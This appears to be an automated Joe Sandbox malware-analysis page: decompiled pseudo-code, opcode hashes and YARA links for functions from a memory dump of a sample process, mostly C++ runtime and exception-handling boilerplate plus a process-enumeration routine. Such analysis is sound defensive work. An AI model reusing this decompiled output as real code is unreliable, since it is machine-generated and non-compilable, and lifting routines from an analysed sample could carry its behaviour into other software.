                                                                                                                                                              0x7ff6e4c4bf0e

                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000B.00000002.401874825.00007FF6E4C41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF6E4C40000, based on PE: true
                                                                                                                                                              • Associated: 0000000B.00000002.401841691.00007FF6E4C40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.401978343.00007FF6E4C89000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402012688.00007FF6E4CA9000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402023641.00007FF6E4CAC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff6e4c40000_System.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2081738530-0
                                                                                                                                                              • Opcode ID: 878fdd97f24f1f5af648782496b4bd12f78439280d182a4bcf6dbe76b7cf8341
                                                                                                                                                              • Instruction ID: 4296e003668090155b8a7381ea11b45398274f889f4709b21f6a9881f7899d8e
                                                                                                                                                              • Opcode Fuzzy Hash: 878fdd97f24f1f5af648782496b4bd12f78439280d182a4bcf6dbe76b7cf8341
                                                                                                                                                              • Instruction Fuzzy Hash: D131532BA58A4381EA10DB31E5802796371FF94FD4F484233DB5E87795EE3EE5428706
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF6E4C4CCA0 Relevance: 9.1, APIs: 6, Instructions: 91COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 93%
                                                                                                                                                              			E00007FF67FF6E4C4CCA0(long long __rbx, void* __rcx, long long __rsi) {
				void* _t32;
				void* _t36;
				void* _t39;
				void* _t40;
				void* _t42;
				signed long long _t51;
				long long _t54;
				long long _t55;
				intOrPtr _t56;
				long long _t57;
				long long _t64;
				intOrPtr _t70;
				void* _t81;
				intOrPtr _t82;
				signed long long _t83;
				long long _t86;
				long long _t88;
				void* _t89;
				void* _t91;
				signed long long _t92;

				 *((long long*)(_t91 + 0x10)) = __rbx;
				 *((long long*)(_t91 + 0x18)) = _t88;
				 *((long long*)(_t91 + 0x20)) = __rsi;
				_t92 = _t91 - 0x40;
				_t51 =  *0xe4ca90a0; // 0x1ae1b17e2973
				 *(_t92 + 0x30) = _t51 ^ _t92;
				_t89 = __rcx;
				E00007FF67FF6E4C60D0C(_t40, _t92 + 0x24);
				_t86 =  *0xe4cabe58; // 0x23fb3c37cf0
				 *((long long*)(_t92 + 0x28)) = _t86;
				_t82 =  *0xe4caa900; // 0x3
				if (_t82 != 0) goto 0xe4c4cd28;
				E00007FF67FF6E4C60D0C(_t40, _t92 + 0x20);
				_t42 =  *0xe4caa900 - _t82; // 0x3
				if (_t42 != 0) goto 0xe4c4cd17;
				_t54 =  *0xe4caa8f0; // 0x4
				_t55 = _t54 + 1;
				 *0xe4caa8f0 = _t55;
				 *0xe4caa900 = _t55;
				_t32 = E00007FF67FF6E4C60D84(_t55, _t92 + 0x20);
				_t83 =  *0xe4caa900; // 0x3
				_t70 =  *((intOrPtr*)(_t89 + 8));
				if (_t83 -  *((intOrPtr*)(_t70 + 0x18)) >= 0) goto 0xe4c4cd41;
				_t56 =  *((intOrPtr*)(_t70 + 0x10));
				if ( *((intOrPtr*)(_t56 + _t83 * 8)) != 0) goto 0xe4c4cda0;
				goto 0xe4c4cd43;
				if ( *((char*)(_t70 + 0x24)) == 0) goto 0xe4c4cd5c;
				E00007FF67FF6E4C6113C(_t32);
				if (_t83 -  *((intOrPtr*)(_t56 + 0x18)) >= 0) goto 0xe4c4cd61;
				_t57 =  *((intOrPtr*)(_t56 + 0x10));
				if ( *((intOrPtr*)(_t57 + _t83 * 8)) != 0) goto 0xe4c4cda0;
				if (_t86 == 0) goto 0xe4c4cd6b;
				goto 0xe4c4cda0;
				E00007FF67FF6E4C42420(_t57, _t86, _t92 + 0x28, _t89, _t86);
				if (_t57 == 0xffffffff) goto 0xe4c4cdcf;
				_t64 =  *((intOrPtr*)(_t92 + 0x28));
				 *((long long*)(_t92 + 0x28)) = _t64;
				E00007FF67FF6E4C61104(_t57, _t64);
				_t36 =  *((intOrPtr*)( *_t64 + 8))(_t81);
				 *0xe4cabe58 = _t64;
				return E00007FF67FF6E4C623B0(E00007FF67FF6E4C60D84(_t36, _t92 + 0x24), _t39,  *(_t92 + 0x30) ^ _t92);
			}























                                                                                                                                                              0x7ff6e4c4cca0
                                                                                                                                                              0x7ff6e4c4cca5
                                                                                                                                                              0x7ff6e4c4ccaa
                                                                                                                                                              0x7ff6e4c4ccb0
                                                                                                                                                              0x7ff6e4c4ccb4
                                                                                                                                                              0x7ff6e4c4ccbe
                                                                                                                                                              0x7ff6e4c4ccc3
                                                                                                                                                              0x7ff6e4c4cccd
                                                                                                                                                              0x7ff6e4c4ccd3
                                                                                                                                                              0x7ff6e4c4ccda
                                                                                                                                                              0x7ff6e4c4ccdf
                                                                                                                                                              0x7ff6e4c4cce9
                                                                                                                                                              0x7ff6e4c4ccf2
                                                                                                                                                              0x7ff6e4c4ccf7
                                                                                                                                                              0x7ff6e4c4ccfe
                                                                                                                                                              0x7ff6e4c4cd00
                                                                                                                                                              0x7ff6e4c4cd06
                                                                                                                                                              0x7ff6e4c4cd08
                                                                                                                                                              0x7ff6e4c4cd10
                                                                                                                                                              0x7ff6e4c4cd1c
                                                                                                                                                              0x7ff6e4c4cd21
                                                                                                                                                              0x7ff6e4c4cd28
                                                                                                                                                              0x7ff6e4c4cd30
                                                                                                                                                              0x7ff6e4c4cd32
                                                                                                                                                              0x7ff6e4c4cd3d
                                                                                                                                                              0x7ff6e4c4cd3f
                                                                                                                                                              0x7ff6e4c4cd47
                                                                                                                                                              0x7ff6e4c4cd49
                                                                                                                                                              0x7ff6e4c4cd52
                                                                                                                                                              0x7ff6e4c4cd54
                                                                                                                                                              0x7ff6e4c4cd5f
                                                                                                                                                              0x7ff6e4c4cd64
                                                                                                                                                              0x7ff6e4c4cd69
                                                                                                                                                              0x7ff6e4c4cd73
                                                                                                                                                              0x7ff6e4c4cd7c
                                                                                                                                                              0x7ff6e4c4cd7e
                                                                                                                                                              0x7ff6e4c4cd83
                                                                                                                                                              0x7ff6e4c4cd8b
                                                                                                                                                              0x7ff6e4c4cd96
                                                                                                                                                              0x7ff6e4c4cd99
                                                                                                                                                              0x7ff6e4c4cdce

                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000B.00000002.401874825.00007FF6E4C41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF6E4C40000, based on PE: true
                                                                                                                                                              • Associated: 0000000B.00000002.401841691.00007FF6E4C40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.401978343.00007FF6E4C89000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402012688.00007FF6E4CA9000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402023641.00007FF6E4CAC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff6e4c40000_System.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2081738530-0
                                                                                                                                                              • Opcode ID: 4c9be20f1ef5c680e45924576cfa7fc921aa7d14d65ea6d9f91fa194d6084132
                                                                                                                                                              • Instruction ID: bef42367fcc4c8bd333300c52d019a01e3023d88c36566ebfa9bc4c63c38e5a4
                                                                                                                                                              • Opcode Fuzzy Hash: 4c9be20f1ef5c680e45924576cfa7fc921aa7d14d65ea6d9f91fa194d6084132
                                                                                                                                                              • Instruction Fuzzy Hash: 7531742BA48A4380EA50DB35E5802796770FF84FD4F095233DA4E877A5DE3EE441970A
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF6E4C50960 Relevance: 9.1, APIs: 6, Instructions: 81COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 93%
                                                                                                                                                              			E00007FF67FF6E4C50960(void* __rax, long long __rbx, void* __rcx, long long _a8, char _a16, void* _a24, long long _a32) {
				void* __rdi;
				void* __rsi;
				void* _t26;
				void* _t30;
				void* _t32;
				void* _t34;
				long long _t44;
				long long _t45;
				intOrPtr _t46;
				long long _t47;
				long long _t54;
				long long _t60;
				intOrPtr _t69;
				signed long long _t70;
				long long _t71;
				void* _t72;

				_a32 = __rbx;
				_t72 = __rcx;
				E00007FF67FF6E4C60D0C(_t32,  &_a16);
				_t71 =  *0xe4caa790; // 0x0
				_a24 = _t71;
				_t69 =  *0xe4cabe68; // 0x0
				if (_t69 != 0) goto 0xe4c509d1;
				E00007FF67FF6E4C60D0C(_t32,  &_a8);
				_t34 =  *0xe4cabe68 - _t69; // 0x0
				if (_t34 != 0) goto 0xe4c509c0;
				_t44 =  *0xe4caa8f0; // 0x4
				_t45 = _t44 + 1;
				 *0xe4caa8f0 = _t45;
				 *0xe4cabe68 = _t45;
				_t26 = E00007FF67FF6E4C60D84(_t45,  &_a8);
				_t70 =  *0xe4cabe68; // 0x0
				_t60 = _a8;
				if (_t70 -  *((intOrPtr*)(_t60 + 0x18)) >= 0) goto 0xe4c509ea;
				_t46 =  *((intOrPtr*)(_t60 + 0x10));
				if ( *((intOrPtr*)(_t46 + _t70 * 8)) != 0) goto 0xe4c50a49;
				goto 0xe4c509ec;
				if ( *((char*)(_t60 + 0x24)) == 0) goto 0xe4c50a05;
				E00007FF67FF6E4C6113C(_t26);
				if (_t70 -  *((intOrPtr*)(_t46 + 0x18)) >= 0) goto 0xe4c50a0a;
				_t47 =  *((intOrPtr*)(_t46 + 0x10));
				if ( *((intOrPtr*)(_t47 + _t70 * 8)) != 0) goto 0xe4c50a49;
				if (_t71 == 0) goto 0xe4c50a14;
				goto 0xe4c50a49;
				E00007FF67FF6E4C52600(_t47, _t71,  &_a24, _t72, _t70, _t71);
				if (_t47 == 0xffffffff) goto 0xe4c50a63;
				_t54 = _a24;
				_a8 = _t54;
				E00007FF67FF6E4C61104(_t47, _t54);
				_t30 =  *((intOrPtr*)( *_t54 + 8))();
				 *0xe4caa790 = _t54;
				return E00007FF67FF6E4C60D84(_t30,  &_a16);
			}



















                                                                                                                                                              0x7ff6e4c50960
                                                                                                                                                              0x7ff6e4c5096c
                                                                                                                                                              0x7ff6e4c50976
                                                                                                                                                              0x7ff6e4c5097c
                                                                                                                                                              0x7ff6e4c50983
                                                                                                                                                              0x7ff6e4c50988
                                                                                                                                                              0x7ff6e4c50992
                                                                                                                                                              0x7ff6e4c5099b
                                                                                                                                                              0x7ff6e4c509a0
                                                                                                                                                              0x7ff6e4c509a7
                                                                                                                                                              0x7ff6e4c509a9
                                                                                                                                                              0x7ff6e4c509af
                                                                                                                                                              0x7ff6e4c509b1
                                                                                                                                                              0x7ff6e4c509b9
                                                                                                                                                              0x7ff6e4c509c5
                                                                                                                                                              0x7ff6e4c509ca
                                                                                                                                                              0x7ff6e4c509d1
                                                                                                                                                              0x7ff6e4c509d9
                                                                                                                                                              0x7ff6e4c509db
                                                                                                                                                              0x7ff6e4c509e6
                                                                                                                                                              0x7ff6e4c509e8
                                                                                                                                                              0x7ff6e4c509f0
                                                                                                                                                              0x7ff6e4c509f2
                                                                                                                                                              0x7ff6e4c509fb
                                                                                                                                                              0x7ff6e4c509fd
                                                                                                                                                              0x7ff6e4c50a08
                                                                                                                                                              0x7ff6e4c50a0d
                                                                                                                                                              0x7ff6e4c50a12
                                                                                                                                                              0x7ff6e4c50a1c
                                                                                                                                                              0x7ff6e4c50a25
                                                                                                                                                              0x7ff6e4c50a27
                                                                                                                                                              0x7ff6e4c50a2c
                                                                                                                                                              0x7ff6e4c50a34
                                                                                                                                                              0x7ff6e4c50a3f
                                                                                                                                                              0x7ff6e4c50a42
                                                                                                                                                              0x7ff6e4c50a62

                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000B.00000002.401874825.00007FF6E4C41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF6E4C40000, based on PE: true
                                                                                                                                                              • Associated: 0000000B.00000002.401841691.00007FF6E4C40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.401978343.00007FF6E4C89000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402012688.00007FF6E4CA9000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402023641.00007FF6E4CAC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff6e4c40000_System.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2081738530-0
                                                                                                                                                              • Opcode ID: 31fa5c03d32787f3e49275017725574edd6588cae595a63aeac21c71a1e0dde7
                                                                                                                                                              • Instruction ID: af6e976f1074b201e2d3d852fa1e688fbd29624a56d33a1769194d2b402d30b3
                                                                                                                                                              • Opcode Fuzzy Hash: 31fa5c03d32787f3e49275017725574edd6588cae595a63aeac21c71a1e0dde7
                                                                                                                                                              • Instruction Fuzzy Hash: 25316F2BA88A4381EA159B76D4902B963B0EF54F90F084133DB5EC7695DE7EE841C30A
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF6E4C50A70 Relevance: 9.1, APIs: 6, Instructions: 81COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 92%
                                                                                                                                                              			E00007FF67FF6E4C50A70(void* __rax, long long __rbx, void* __rcx, long long _a8, char _a16, void* _a24, long long _a32) {
				void* _t26;
				void* _t30;
				void* _t32;
				void* _t34;
				long long _t44;
				long long _t45;
				intOrPtr _t46;
				long long _t47;
				long long _t54;
				long long _t60;
				intOrPtr _t69;
				signed long long _t70;
				long long _t71;
				void* _t72;

				_a32 = __rbx;
				_t72 = __rcx;
				E00007FF67FF6E4C60D0C(_t32,  &_a16);
				_t71 =  *0xe4caa798; // 0x0
				_a24 = _t71;
				_t69 =  *0xe4cabe88; // 0x0
				if (_t69 != 0) goto 0xe4c50ae1;
				E00007FF67FF6E4C60D0C(_t32,  &_a8);
				_t34 =  *0xe4cabe88 - _t69; // 0x0
				if (_t34 != 0) goto 0xe4c50ad0;
				_t44 =  *0xe4caa8f0; // 0x4
				_t45 = _t44 + 1;
				 *0xe4caa8f0 = _t45;
				 *0xe4cabe88 = _t45;
				_t26 = E00007FF67FF6E4C60D84(_t45,  &_a8);
				_t70 =  *0xe4cabe88; // 0x0
				_t60 = _a8;
				if (_t70 -  *((intOrPtr*)(_t60 + 0x18)) >= 0) goto 0xe4c50afa;
				_t46 =  *((intOrPtr*)(_t60 + 0x10));
				if ( *((intOrPtr*)(_t46 + _t70 * 8)) != 0) goto 0xe4c50b59;
				goto 0xe4c50afc;
				if ( *((char*)(_t60 + 0x24)) == 0) goto 0xe4c50b15;
				E00007FF67FF6E4C6113C(_t26);
				if (_t70 -  *((intOrPtr*)(_t46 + 0x18)) >= 0) goto 0xe4c50b1a;
				_t47 =  *((intOrPtr*)(_t46 + 0x10));
				if ( *((intOrPtr*)(_t47 + _t70 * 8)) != 0) goto 0xe4c50b59;
				if (_t71 == 0) goto 0xe4c50b24;
				goto 0xe4c50b59;
				E00007FF67FF6E4C527A0(_t47, _t71,  &_a24, _t72);
				if (_t47 == 0xffffffff) goto 0xe4c50b73;
				_t54 = _a24;
				_a8 = _t54;
				E00007FF67FF6E4C61104(_t47, _t54);
				_t30 =  *((intOrPtr*)( *_t54 + 8))();
				 *0xe4caa798 = _t54;
				return E00007FF67FF6E4C60D84(_t30,  &_a16);
			}

















                                                                                                                                                              0x7ff6e4c50a70
                                                                                                                                                              0x7ff6e4c50a7c
                                                                                                                                                              0x7ff6e4c50a86
                                                                                                                                                              0x7ff6e4c50a8c
                                                                                                                                                              0x7ff6e4c50a93
                                                                                                                                                              0x7ff6e4c50a98
                                                                                                                                                              0x7ff6e4c50aa2
                                                                                                                                                              0x7ff6e4c50aab
                                                                                                                                                              0x7ff6e4c50ab0
                                                                                                                                                              0x7ff6e4c50ab7
                                                                                                                                                              0x7ff6e4c50ab9
                                                                                                                                                              0x7ff6e4c50abf
                                                                                                                                                              0x7ff6e4c50ac1
                                                                                                                                                              0x7ff6e4c50ac9
                                                                                                                                                              0x7ff6e4c50ad5
                                                                                                                                                              0x7ff6e4c50ada
                                                                                                                                                              0x7ff6e4c50ae1
                                                                                                                                                              0x7ff6e4c50ae9
                                                                                                                                                              0x7ff6e4c50aeb
                                                                                                                                                              0x7ff6e4c50af6
                                                                                                                                                              0x7ff6e4c50af8
                                                                                                                                                              0x7ff6e4c50b00
                                                                                                                                                              0x7ff6e4c50b02
                                                                                                                                                              0x7ff6e4c50b0b
                                                                                                                                                              0x7ff6e4c50b0d
                                                                                                                                                              0x7ff6e4c50b18
                                                                                                                                                              0x7ff6e4c50b1d
                                                                                                                                                              0x7ff6e4c50b22
                                                                                                                                                              0x7ff6e4c50b2c
                                                                                                                                                              0x7ff6e4c50b35
                                                                                                                                                              0x7ff6e4c50b37
                                                                                                                                                              0x7ff6e4c50b3c
                                                                                                                                                              0x7ff6e4c50b44
                                                                                                                                                              0x7ff6e4c50b4f
                                                                                                                                                              0x7ff6e4c50b52
                                                                                                                                                              0x7ff6e4c50b72

                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000B.00000002.401874825.00007FF6E4C41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF6E4C40000, based on PE: true
                                                                                                                                                              • Associated: 0000000B.00000002.401841691.00007FF6E4C40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.401978343.00007FF6E4C89000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402012688.00007FF6E4CA9000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402023641.00007FF6E4CAC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff6e4c40000_System.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2081738530-0
                                                                                                                                                              • Opcode ID: b9fcf9ec62361f966f603e416c2a9d2b9b1d75b488670cf5e4cbdce9332d5faf
                                                                                                                                                              • Instruction ID: f031af5352a4215b680cd6f82155c20c82f10713bd2a799570338e2cd1c1660e
                                                                                                                                                              • Opcode Fuzzy Hash: b9fcf9ec62361f966f603e416c2a9d2b9b1d75b488670cf5e4cbdce9332d5faf
                                                                                                                                                              • Instruction Fuzzy Hash: B731902BA88A4381EA11DB76D4C03B963B0EF54F94F085133DB4EC7695DE6EE441C30A
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF6E4C45330 Relevance: 9.1, APIs: 6, Instructions: 72processCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000B.00000002.401874825.00007FF6E4C41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF6E4C40000, based on PE: true
                                                                                                                                                              • Associated: 0000000B.00000002.401841691.00007FF6E4C40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.401978343.00007FF6E4C89000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402012688.00007FF6E4CA9000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402023641.00007FF6E4CAC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff6e4c40000_System.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Process32$Next$CloseCreateFirstHandleSnapshotToolhelp32
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2284531361-0
                                                                                                                                                              • Opcode ID: 39d09240c3e57bf505224a1dad52521adbc0ca33928afe64590b9b86d9a9dbbe
                                                                                                                                                              • Instruction ID: c7ab5811caa77c57cc51ce98bab0215588d6ee71c9fbb20fe539291f807e7bd9
                                                                                                                                                              • Opcode Fuzzy Hash: 39d09240c3e57bf505224a1dad52521adbc0ca33928afe64590b9b86d9a9dbbe
                                                                                                                                                              • Instruction Fuzzy Hash: AC315E3AA48A8785EA708B21E5843AA73B1FB49F84F844532CA8D87754DF3EE545C706
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF6E4C65E84 Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 317COMMONLIBRARYCODE
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 72%
                                                                                                                                                              			E00007FF67FF6E4C65E84(void* __ecx, long long* __rcx, long long __rdx, void* __r8, void* __r9) {
				void* __rbx;
				void* __rdi;
				void* __rsi;
				void* __rbp;
				void* _t162;
				void* _t173;
				void* _t174;
				signed long long _t212;
				signed long long _t213;
				void* _t219;
				void* _t221;
				long long _t224;
				unsigned long long _t225;
				long long _t228;
				long long _t230;
				intOrPtr* _t231;
				long long _t243;
				signed long long _t245;
				signed long long _t249;
				signed long long _t261;
				signed long long _t262;
				signed long long _t263;
				unsigned long long _t266;
				long long _t290;
				void* _t291;
				void* _t292;
				void* _t293;
				signed long long _t294;
				long long _t303;
				long long _t304;
				intOrPtr* _t305;
				long long _t313;
				signed char* _t316;
				intOrPtr _t321;

				_t292 = _t293 - 0x88;
				_t294 = _t293 - 0x188;
				_t212 =  *0xe4ca90a0; // 0x1ae1b17e2973
				_t213 = _t212 ^ _t294;
				 *(_t292 + 0x70) = _t213;
				_t316 =  *((intOrPtr*)(_t292 + 0xf0));
				 *((long long*)(_t294 + 0x78)) = __rdx;
				 *((long long*)(_t292 - 0x60)) =  *((intOrPtr*)(_t292 + 0x108));
				_t291 = __r9;
				 *((char*)(_t294 + 0x60)) = 0;
				E00007FF67FF6E4C65134(_t316, __r9, __r9);
				if ( *((long long*)(__r9 + 0x48)) == 0) goto 0xe4c65f00;
				E00007FF67FF6E4C64EF8(_t213);
				if ( *((long long*)(_t213 + 0x78)) != 0xfffffffe) goto 0xe4c66379;
				goto 0xe4c65f1f;
				E00007FF67FF6E4C64EF8(_t213);
				if ( *((long long*)(_t213 + 0x78)) == 0xfffffffe) goto 0xe4c65f1f;
				E00007FF67FF6E4C64EF8(_t213);
				_t290 =  *((intOrPtr*)(_t213 + 0x78));
				E00007FF67FF6E4C64EF8(_t213);
				 *((long long*)(_t213 + 0x78)) = 0xfffffffe;
				if (_t290 - 0xffffffff < 0) goto 0xe4c66379;
				if (_t316[8] == 0) goto 0xe4c65f5f;
				_t249 =  *(_t316[8] +  *((intOrPtr*)(__r9 + 8))) & 0xf;
				goto 0xe4c65f61;
				if (_t290 >= 0) goto 0xe4c66379;
				if ( *__rcx != 0xe06d7363) goto 0xe4c66039;
				if ( *((long long*)(__rcx + 0x18)) != 4) goto 0xe4c66039;
				_t219 =  *((intOrPtr*)(__rcx + 0x20)) - 0x19930520;
				if (_t219 - 2 > 0) goto 0xe4c66039;
				if ( *((long long*)(__rcx + 0x30)) != 0) goto 0xe4c66039;
				E00007FF67FF6E4C64EF8(_t219);
				if ( *((long long*)(_t219 + 0x20)) == 0) goto 0xe4c66317;
				E00007FF67FF6E4C64EF8(_t219);
				_t245 =  *((intOrPtr*)(_t219 + 0x20));
				E00007FF67FF6E4C64EF8(_t219);
				 *((char*)(_t294 + 0x60)) = 1;
				E00007FF67FF6E4C63E28(_t219,  *((intOrPtr*)(_t245 + 0x38)));
				if ( *_t245 != 0xe06d7363) goto 0xe4c65ff1;
				if ( *((long long*)(_t245 + 0x18)) != 4) goto 0xe4c65ff1;
				_t221 =  *((intOrPtr*)(_t245 + 0x20)) - 0x19930520;
				if (_t221 - 2 > 0) goto 0xe4c65ff1;
				if ( *((long long*)(_t245 + 0x30)) == 0) goto 0xe4c66379;
				E00007FF67FF6E4C64EF8(_t221);
				if ( *(_t221 + 0x38) == 0) goto 0xe4c66039;
				E00007FF67FF6E4C64EF8(_t221);
				E00007FF67FF6E4C64EF8(_t221);
				 *(_t221 + 0x38) =  *(_t221 + 0x38) & 0x00000000;
				if (E00007FF67FF6E4C67D10(_t221, _t245, _t245,  *(_t221 + 0x38), __r9) != 0) goto 0xe4c66034;
				if (E00007FF67FF6E4C67E00(_t221, _t245,  *(_t221 + 0x38), __r9, _t292) == 0) goto 0xe4c6635b;
				goto 0xe4c66337;
				E00007FF67FF6E4C67054(_t292 - 0x10, _t316,  *((intOrPtr*)(__r9 + 8)));
				if ( *_t245 != 0xe06d7363) goto 0xe4c662cf;
				if ( *((long long*)(_t245 + 0x18)) != 4) goto 0xe4c662cf;
				if ( *((intOrPtr*)(_t245 + 0x20)) - 0x19930520 - 2 > 0) goto 0xe4c662cf;
				if ( *((long long*)(_t292 - 0x10)) <= 0) goto 0xe4c662b4;
				_t224 =  *((intOrPtr*)(_t292 + 0x100));
				 *((long long*)(_t294 + 0x28)) = _t224;
				 *(_t294 + 0x20) = _t316;
				r8d = _t173;
				E00007FF67FF6E4C6380C(_t245, _t292 - 0x58, _t292 - 0x10, _t290, _t291, _t292);
				asm("movups xmm0, [ebp-0x58]");
				asm("movdqu [ebp-0x78], xmm0");
				asm("psrldq xmm0, 0x8");
				asm("movd eax, xmm0");
				if (_t224 -  *((intOrPtr*)(_t292 - 0x40)) >= 0) goto 0xe4c662b4;
				_t225 =  *((intOrPtr*)(_t292 - 0x70));
				 *((long long*)(_t292 - 0x80)) =  *((intOrPtr*)(_t292 - 0x58));
				 *(_t294 + 0x68) = _t225;
				asm("inc ecx");
				asm("dec ax");
				asm("movups [ebp-0x78], xmm0");
				if (_t225 - _t290 > 0) goto 0xe4c6620f;
				if (_t290 - _t225 >> 0x20 > 0) goto 0xe4c6620f;
				r9d =  *((intOrPtr*)( *((intOrPtr*)(_t291 + 0x10))));
				E00007FF67FF6E4C66FD8( *((intOrPtr*)(_t291 + 0x10)), _t292 + 0x20, _t292 - 0x78,  *((intOrPtr*)(_t291 + 8)));
				_t228 =  *((intOrPtr*)(_t292 + 0x20));
				r12d = 0;
				 *((intOrPtr*)(_t294 + 0x64)) = r12d;
				 *((long long*)(_t294 + 0x6c)) = _t228;
				if (_t228 == 0) goto 0xe4c6620f;
				asm("movups xmm0, [ebp+0x38]");
				asm("movups xmm1, [ebp+0x48]");
				asm("movups [ebp-0x38], xmm0");
				asm("movsd xmm0, [ebp+0x58]");
				asm("movsd [ebp-0x18], xmm0");
				asm("movups [ebp-0x28], xmm1");
				E00007FF67FF6E4C63DFC(_t228);
				_t230 = _t228 + 4 +  *((intOrPtr*)( *((intOrPtr*)(_t245 + 0x30)) + 0xc));
				 *((long long*)(_t294 + 0x70)) = _t230;
				E00007FF67FF6E4C63DFC(_t230);
				r15d =  *((intOrPtr*)(_t230 +  *((intOrPtr*)( *((intOrPtr*)(_t245 + 0x30)) + 0xc))));
				if (r15d <= 0) goto 0xe4c6619a;
				E00007FF67FF6E4C63DFC(_t230);
				_t231 =  *((intOrPtr*)(_t294 + 0x70));
				_t313 = _t230 +  *_t231;
				E00007FF67FF6E4C669C8(_t174, _t245, _t292 - 0x38, _t313, _t290, _t291,  *((intOrPtr*)(_t245 + 0x30)));
				if (_t231 != 0) goto 0xe4c661b7;
				 *((long long*)(_t294 + 0x70)) =  *((long long*)(_t294 + 0x70)) + 4;
				r15d = r15d - 1;
				if (r15d > 0) goto 0xe4c66160;
				r12d =  *((intOrPtr*)(_t294 + 0x64));
				E00007FF67FF6E4C675C4(_t231, _t292 + 0x20);
				r12d = r12d + 1;
				 *((intOrPtr*)(_t294 + 0x64)) = r12d;
				if (r12d ==  *((intOrPtr*)(_t294 + 0x6c))) goto 0xe4c6620b;
				goto 0xe4c66117;
				 *((char*)(_t294 + 0x58)) =  *((intOrPtr*)(_t292 + 0xf8));
				_t261 = _t245;
				 *((char*)(_t294 + 0x50)) =  *((intOrPtr*)(_t294 + 0x60));
				 *((long long*)(_t294 + 0x48)) =  *((intOrPtr*)(_t292 - 0x60));
				 *((long long*)(_t294 + 0x40)) =  *((intOrPtr*)(_t292 + 0x100));
